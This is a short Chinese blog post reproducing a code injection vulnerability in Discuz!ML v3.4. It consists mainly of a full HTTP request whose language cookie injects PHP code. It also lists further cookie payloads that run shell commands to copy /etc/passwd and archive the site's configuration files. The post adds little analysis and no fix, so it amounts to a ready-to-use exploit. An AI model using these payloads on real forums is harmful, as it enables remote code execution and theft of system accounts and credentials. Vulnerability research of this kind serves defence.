前言

继续复现漏洞。这一次是 Discuz!ML V3.X 。该版本存在一个代码注入漏洞。

过程

• 构建环境
  下载地址 http://discuz.ml/download

这里我下载的是 Discuz!ML v.3.4

image.png

• 开始复现

GET /forum.php HTTP/1.1
Host: discuzml34.wwf
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://discuzml34.wwf/forum.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Q5yo_2132_saltkey=T0MbvDuM; Q5yo_2132_lastvisit=1564057667; Q5yo_2132_sid=QzyMJJ; Q5yo_2132_sendmail=1; Q5yo_2132_onlineusernum=1; Q5yo_2132_language=en'.phpinfo().'; Q5yo_2132_lastact=1564061466%09index.php%09
Connection: close

image.png

评论

该漏洞还蛮严重的。可以随意执行脚本。
其他payload

//获取系统账号
en'.printf(exec("cat /etc/passwd > 1.txt")).'
//打包配置文件。
en'.printf(exec("tar -cvf 1.tar config ")).'

相关文章

https://xz.aliyun.com/t/5638

http://esoln.net/esoln/blog/2019/06/14/discuzml-v-3-x-code-injection-vulnerability/